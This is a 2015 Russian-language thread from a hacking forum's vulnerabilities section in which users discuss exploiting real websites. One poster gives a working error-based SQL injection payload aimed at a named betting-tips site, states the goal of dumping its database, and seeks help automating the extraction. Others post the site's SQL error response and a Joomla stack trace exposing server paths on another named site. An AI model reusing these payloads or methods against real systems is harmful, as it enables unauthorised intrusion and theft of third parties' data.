HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.12.2015, 16:29
vivona
Новичок
Регистрация: 26.12.2015
Сообщений: 12
С нами: 5464406

Репутация: 0
По умолчанию

Цитата:
Сообщение от vivona  

не тянет не хавидж не sqlmap вот такую вот скулю
Код:
http://www.sosbettingtips.com/'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1
как раскрутить sqlmapom или еще чем нить это божетво.
руками все норм, нужно слить базу но незнаю как кроме sqlmap или хавидж
 
Ответить с цитированием

  #2  
Старый 26.12.2015, 16:31
PoliGroS
Познающий
Регистрация: 29.03.2012
Сообщений: 77
С нами: 7432886

Репутация: 0
По умолчанию

Цитата:
Сообщение от vivona  

Ставь Live http headers на мозилу и крути
я через burp suite работаю, мне интересно что это за уязвимость и как ее дальше крутить? как обычную sql?

Получаю вот такой ответ.

Цитата:
Сообщение от None  
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND print_status=0 AND print_redirect='' GROUP BY app_deal.id ORDER BY print_st' at line 1
 
Ответить с цитированием

  #3  
Старый 26.12.2015, 16:38
vivona
Новичок
Регистрация: 26.12.2015
Сообщений: 12
С нами: 5464406

Репутация: 0
По умолчанию

Цитата:
Сообщение от PoliGroS  

я через burp suite работаю, мне интересно что это за уязвимость и как ее дальше крутить? как обычную sql?
Получаю вот такой ответ.
 
Ответить с цитированием

  #4  
Старый 26.12.2015, 16:38
vivona
Новичок
Регистрация: 26.12.2015
Сообщений: 12
С нами: 5464406

Репутация: 0
По умолчанию

поробуй через error baze вывести имена таблиц вот таким запросом

Код:
'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1
 
Ответить с цитированием

  #5  
Старый 26.12.2015, 19:49
PoliGroS
Познающий
Регистрация: 29.03.2012
Сообщений: 77
С нами: 7432886

Репутация: 0
По умолчанию

Цитата:
Сообщение от vivona  

поробуй через error baze вывести имена таблиц вот таким запросом
Код:
'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1
Цитата:
Сообщение от None  
HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=UTF-8
Date: Sat, 26 Dec 2015 15:48:10 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Content-Length: 227
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND print_status=0 AND print_redirect='' GROUP BY app_deal.id ORDER BY print_st' at line 1
 
Ответить с цитированием

  #6  
Старый 27.12.2015, 15:20
vivona
Новичок
Регистрация: 26.12.2015
Сообщений: 12
С нами: 5464406

Репутация: 0
По умолчанию

Цитата:
Сообщение от vivona  

руками все норм, нужно слить базу но незнаю как кроме sqlmap или хавидж
что некто не может раскрутить*?)
 
Ответить с цитированием

  #7  
Старый 27.12.2015, 18:32
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами: 9721141

Репутация: 1013
По умолчанию

Цитата:
Сообщение от vivona  

что некто не может раскрутить*?)
написать скрипт же
 
Ответить с цитированием

  #8  
Старый 27.12.2015, 18:49
vivona
Новичок
Регистрация: 26.12.2015
Сообщений: 12
С нами: 5464406

Репутация: 0
По умолчанию

Цитата:
Сообщение от yarbabin  

написать скрипт же
Да вот найти бы умельца(сам в этом еще не соображаю
 
Ответить с цитированием

  #9  
Старый 27.12.2015, 21:32
.Light.
Участник форума
Регистрация: 12.07.2010
Сообщений: 190
С нами: 8334326

Репутация: 0
По умолчанию

jos-Warning: exception 'RuntimeException' with message 'Unknown column 'header' in 'field list' SQL=SELECT `new_url`,`header`,`published` FROM `j1_redirect_links` WHERE `old_url` = 'http://www.raa.ru/index.php?id=2011\'' LIMIT 0, 1' in /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver/mysqli.php:610 Stack trace: #0 /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver.php(1279): JDatabaseDriverMysqli->execute() #1 /home/w/wermark/raa.ru/public_html/plugins/system/redirect/redirect.php(86): JDatabaseDriver->loadObject() #2 [internal function]: PlgSystemRedirect::handleError(Object(JException)) #3 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(760): call_user_func(Array, Object(JException)) #4 [internal function]: JError::handleCallback(Object(JException), Array) #5 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(218): call_user_func_array(Array, Array) #6 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(179): JError::throwError(Object(JException)) #7 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(254): JError::raise(1, 404, '???????????????...', NULL, true) #8 /home/w/wermark/raa.ru/public_html/components/com_content/models/article.php(163): JError::raiseError(404, '???????????????...') #9 /home/w/wermark/raa.ru/public_html/libraries/legacy/view/legacy.php(401): ContentModelArticle->getItem() #10 /home/w/wermark/raa.ru/public_html/components/com_content/views/article/view.html.php(42): JViewLegacy->get('Item') #11 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(690): ContentViewArticle->display() #12 /home/w/wermark/raa.ru/public_html/components/com_content/controller.php(104): JControllerLegacy->display(true, Array) #13 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(728): ContentController->display() #14 /home/w/wermark/raa.ru/public_html/components/com_content/content.php(38): JControllerLegacy->execute(NULL) #15 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(392): require_once('/home/w/wermark...') #16 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(372): JComponentHelper::executeComponent('/home/w/wermark...') #17 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(191): JComponentHelper::renderComponent('com_content') #18 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(230): JApplicationSite->dispatch() #19 /home/w/wermark/raa.ru/public_html/libraries/cms/application/cms.php(252): JApplicationSite->doExecute() #20 /home/w/wermark/raa.ru/public_html/index.php(48): JApplicationCms->execute() #21 {main}

Что можно хорошего получить от этой ошибки?
 
Ответить с цитированием

  #10  
Старый 28.12.2015, 00:03
vivona
Новичок
Регистрация: 26.12.2015
Сообщений: 12
С нами: 5464406

Репутация: 0
По умолчанию

Цитата:
Сообщение от .Light.  

jos-Warning
: exception 'RuntimeException' with message 'Unknown column 'header' in 'field list' SQL=SELECT `new_url`,`header`,`published` FROM `j1_redirect_links` WHERE `old_url` = '
http://www.raa.ru/index.php?id=2011\
'' LIMIT 0, 1' in /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver/mysqli.php:610 Stack trace: #0 /home/w/wermark/raa.ru/public_html/libraries/joomla/database/driver.php(1279): JDatabaseDriverMysqli->execute() #1 /home/w/wermark/raa.ru/public_html/plugins/system/redirect/redirect.php(86): JDatabaseDriver->loadObject() #2 [internal function]: PlgSystemRedirect::handleError(Object(JException)) #3 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(760): call_user_func(Array, Object(JException)) #4 [internal function]: JError::handleCallback(Object(JException), Array) #5 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(218): call_user_func_array(Array, Array) #6 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(179): JError::throwError(Object(JException)) #7 /home/w/wermark/raa.ru/public_html/libraries/legacy/error/error.php(254): JError::raise(1, 404, '???????????????...', NULL, true) #8 /home/w/wermark/raa.ru/public_html/components/com_content/models/article.php(163): JError::raiseError(404, '???????????????...') #9 /home/w/wermark/raa.ru/public_html/libraries/legacy/view/legacy.php(401): ContentModelArticle->getItem() #10 /home/w/wermark/raa.ru/public_html/components/com_content/views/article/view.html.php(42): JViewLegacy->get('Item') #11 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(690): ContentViewArticle->display() #12 /home/w/wermark/raa.ru/public_html/components/com_content/controller.php(104): JControllerLegacy->display(true, Array) #13 /home/w/wermark/raa.ru/public_html/libraries/legacy/controller/legacy.php(728): ContentController->display() #14 /home/w/wermark/raa.ru/public_html/components/com_content/content.php(38): JControllerLegacy->execute(NULL) #15 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(392): require_once('/home/w/wermark...') #16 /home/w/wermark/raa.ru/public_html/libraries/cms/component/helper.php(372): JComponentHelper::executeComponent('/home/w/wermark...') #17 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(191): JComponentHelper::renderComponent('com_content') #18 /home/w/wermark/raa.ru/public_html/libraries/cms/application/site.php(230): JApplicationSite->dispatch() #19 /home/w/wermark/raa.ru/public_html/libraries/cms/application/cms.php(252): JApplicationSite->doExecute() #20 /home/w/wermark/raa.ru/public_html/index.php(48): JApplicationCms->execute() #21 {main}
Что можно хорошего получить от этой ошибки?
раскрытие путей, не больше, скули тут нет
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...